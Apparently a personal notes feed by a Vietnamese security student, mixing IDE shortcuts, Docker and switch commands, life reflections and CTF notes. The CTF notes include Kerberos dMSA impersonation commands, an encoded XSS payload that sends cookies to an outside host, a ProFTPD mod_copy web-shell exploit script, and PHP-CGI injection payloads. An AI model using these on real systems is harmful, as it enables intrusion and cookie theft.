Spycio.Kon

  1) Open the Group Policy editor using gpmc.msc 2) Select your domain and expand Group Policy Objects then right click on "Default Domain Controller Policy" and Click Edit 3) Under Computer Management, expand Policies and then select Windows Settings 4) Expand Security Settings and Select Local Policies and then click on User Rights Management 5) Right click on Deny log on locally and click on Properties 6) In the next screen you can remove the User of Group that you want

  sudo vmware-toolbox-cmd timesync disable ------------- cd "C:\Program Files\VMware\VMware Tools" vmtoolsd.exe timesync disable proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA   $$' -debug TZ=UTC faketime '2026-01-14 10:45:09' proxychains impacket-getST 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'

Double shilf: Tìm nhanh mọi tứ trong project lớn = Ctrl + N Ctrl + B: Theo doi nguon goc bien - trace luong truoc Alt + F7: Tìm nơi sử dụng biến Ctrl + Shilf + F: tìm kiếm text toàn project Shilf + F10: Run Shilf + F9: Debug F9: chạy đến breakpoint kế tiếp F8: Step over F7: Step into Shift + F8: thoát khỏi method hiện tại Ctrl + ALT + L: format code Ctrl + F12: hiển thị các methods

 Năm 2025 là một năm chán vô cùng chán với mình Mình đi được nhiều nơi, được tham gia diễn tập nhiều thứ :D Noel nè <(") Tự tổ chức CTF đợt noel vừa rồi. -__-. Ổn áp với nghiên cứu khoa học - một ông anh gánh cực lực team, một bạn nữ xinh xắn giỏi cực, một giảng viên hướng dẫn tâm huyết và mình là thk ngu nhất trong tổ đội đó Hoàn thành thực tập tốt nghiệp trước hạn tận 1 năm :v Mình lười quá nên làm cho sớm để giờ tập trung công việc và đồ án. Dẫn bố đi ăn chơi lung tung và bị lạc đường <(") Cái lớp này cutie  Được 1 ông anh mời colab :))) mấy đợt colab này học được nhiều thứ phết, rất đáng giá, em cảm ơn anh  Mua được cả đống sách với giá hời, mất tầm hơn 1 triệu nhưng nhìn tủ sách mình mà thèm <(") Được kouhai tặng quà sinh nhật - vui phết, cũng nên cảm ơn 1 tiếng :3 Rấc là cutie Tập add lại mấy đứa cũ -__-, Có con nhóc kia làm mình bất ngờ thật <(") cũng có thể coi là 1 trong những độc giả đời đầu của mình. Méo hiểu tại sao hồi xưa u lại thích a đc t...

 Djtme lỗi quá sudo apt remove -y docker docker.io docker-doc docker-compose docker-compose-plugin docker-buildx docker-buildx-plugin podman-docker containerd runc sudo apt autoremove -y sudo rm -f /usr/libexec/docker/cli-plugins/docker-buildx sudo apt update sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin sudo usermod -aG docker $USER docker run --rm hello-world

Giả sử một tình huống bạn tình cờ biết rằng có một đợt đăng kí cực kì ưu đãi và chỉ có một slot duy nhất, nếu đăng kí bạn sẽ có một khoản tiền tương đối lớn khoảng 10 tỷ, nếu chậm trễ bạn sẽ chẳng có gì. Tuy nhiên nó yêu cầu bạn cung cấp số điện thoại và chứng minh nhân dân kèm một số thông tin cá nhân riêng tư khác. Bạn không muốn để lộ thông tin cá nhân vì bạn biết điều này sẽ ảnh hưởng về sau của bạn, nên bạn đề nghị một người bạn đi cùng đăng kí hộ và cùng ăn chia tiền thưởng. Ban đầu người bạn đồng ý chia 50:50 nhưng sau khi nghe tin con số lên tới 10 tỷ người bạn muốn họ ăn 80 còn bạn chỉ 20. Lúc này bạn sẽ phản ứng thế nào. Nhìn chung cách mọi người sẽ phản ứng gay gắt với người bạn kia và nghĩ họ tham lam rồi tự mình lấy luôn 10 tỷ. Nhưng nếu cùng nhìn 1 góc độ khác, 2 tỷ cũng không phải là một khoản tiền nhỏ, người bạn kia cũng đánh đổi giá trị là thông tin của họ, còn bạn, bạn chẳng hề mất gì cả nhưng vẫn có 2 tỷ và cả sự biết ơn của người kia. Con người thường kì vọng quá ca...

Gieo một hạt thóc, gặt một cánh đồng nhưng thóc không chăm thì thóc chết Thả con săn sắt bắt con cá rô nhưng cá thả mà không backup thì vô nghĩa Khai thác con người nhưng lơ là bản thân thì vô dụng 

 Các chế độ thực thi của switch >: chế độ người dùng Chỉ cho phép truy cập 1 số lệnh giám sát cơ bản #: chế độ đặc quyền Cho phép truy cập vào tất cả các lệnh và tính năng #(config): chế độ thiết lập cấu hình thiết bị được sử dụng để cấu hình thiết bị ---------- cách lệnh phổ thông exit, end, Ctrl + Z, logout, disable: để giảm 1 quyền show: hiển thị trạng thái thiết bị show arp: hiển thị bảng arp show mac: hiển thị cấu hình mac show mac-address-table: hiển thi bảng chuyển tiếp mac show interfaces: hiển thị trạng thái và cấu hình và giao diện show vlan: hiển thị trạng thái vlan show vlan brief: hiển thị tóm tắt của mọi trạng thái vlan show vlan id a: hiển thị tóm tắt của trạng thái vlan nào đó, nếu vlan = 1 thì thay a =1 show running-config: cấu hình hoạt động hiện tại của thiết bị show int fa0/1: hiện thị thông tin interfae fa0/1 show int: hiển thị thông tin của các giao diện show int fa0/3 status: hiển thị trạng thái, vlan, chế độ truyền và cả tốc độ cổng fa0/3 ---------- cấu h...

 HKLM\SYSTEM\CurrentControlSet\Control\ Session Manager\BootExecute (native in  C:\Windows\System32) https://github.com/Fyyre/ntdll https://github.com/winsiderss/phnt  nmake msvc linker -> system -> subsystem(native) linker -> input -> addindependence -> path to ntdll linker -> input -> ignore all default library -> yes C/C++ -> general -> Add include dependence -> path to phnt C/C++ -> code generation -> basic runtime check -> default C/C++ -> code generation -> security check -> disable C/C++ -> General -> debug information -> program database (/Zi) C/C++ -> General -> SDL check -> no sdl

C/C+ -> Precompiled header -> Precompiled header (not using.)

 Build exe không có console mặc dù là console :D linker-advance -> entrypoint -> mainCRTStartup C/C++ > Code Generation > Runtime Library

 Ta rất muốn xem, với một kẻ không có thiên phú, không có người nâng đỡ, cũng không có người chỉ đường, càng không có bối cảnh to lớn có thể tự thân nỗ lực đi được bao xa. Chỉ với sự quyết tâm và lòng không chịu thua thì một kẻ không có gì có thể vượt qua được kẻ có được tất cả mọi thứ hay không.

 sudo update-alternatives --config java

Intigriti - HackDonals Nextjs - CVE-2025-29927 + XXE

 https://github.com/SpycioKon/m3u-injection-telegram

 Book Dompurify 3.2.2 co vuln nhung ko exploit dc payload http://172.31.3.2:8000/book?title=PGgxIGlkPSJjb25maWciPjxoMSBpZD0iY29uZmlnIiBuYW1lPSJERUJVRyI%2BPC9oMT48L2gxPg%3D%3D&content=PGltZyBzcmM9eDogb25lcnJvcj0iKG5ldyBJbWFnZSkuc3JjPScvL3Bnb2hpaGd2LnJlcXVlc3RyZXBvLmNvbT8nK2RvY3VtZW50LmNvb2tpZSI%2BDQoNCg%3D%3D

└─$ source venv/bin/activate

#!/usr/bin/env python3 import sys import socket import requests def exploit ( client , target ):     client .connect(( target , 21 )) # Connecting to the target server     banner = client .recv( 74 )     print ( banner .decode())     client .send( b 'site cpfr /proc/self/cmdline \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /tmp/<?php system("id"); ?> \r\n ' ) # phpinfo() is just a PoC.     print ( client .recv( 1024 ).decode())     client .send( b 'site cpfr /tmp/<?php system("id"); ?> \r\n ' )     print ( client .recv( 1024 ).decode())     client .send( b 'site cpto /var/www/html/konchan.php \r\n ' )     print ( client .recv( 1024 ).decode())     client .close()     print ( 'Exploit Completed' ) def check ( url ):     req = requests . get ( url ) # Requesting the written PoC php file via HT...

CVE-2012-1823 && CVE-2024-4577 (PHP CGI ARGURMENT INJECTION) $HOST /?-f C:\Windows\System32\Drivers\etc\hosts $HOST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input <?php system("ls -la"); ?>